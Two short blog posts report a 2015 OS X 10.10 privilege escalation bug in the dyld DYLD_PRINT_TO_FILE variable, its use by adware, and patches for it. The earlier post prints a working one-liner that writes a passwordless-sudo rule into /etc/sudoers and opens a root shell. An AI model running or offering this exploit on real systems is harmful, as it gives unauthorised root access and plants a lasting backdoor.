Aug 15 04

DYLD_PRINT_TO_FILEOh no, only a couple of days after OS X  a privilege escalation vulnerability in OS X 10.10 was discovered a researcher at Malwarebytes spot a new adware installer that uses DYLD_PRINT_TO_FILE exploit.

What you can do?

  • wait until Apple released a security update while you get p0wned
  • install SUIDGuard – A kernel extension adding mitigations to protect SUID/SGID binaries

written by d45id \\ tags: , , , , ,

Jul 15 23

alertSecurity expert Stefan Esser discovered a privilege escalation vulnerability in OS X 10.10. The vulnerability is found in the dynamic linker dyld.

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

OS X 10.11 pre release candidate is not vulnerable. For all the people who want to fix the problem as soon as possible a patch was published by Esser.

written by d45id \\ tags: , , , , , , , , ,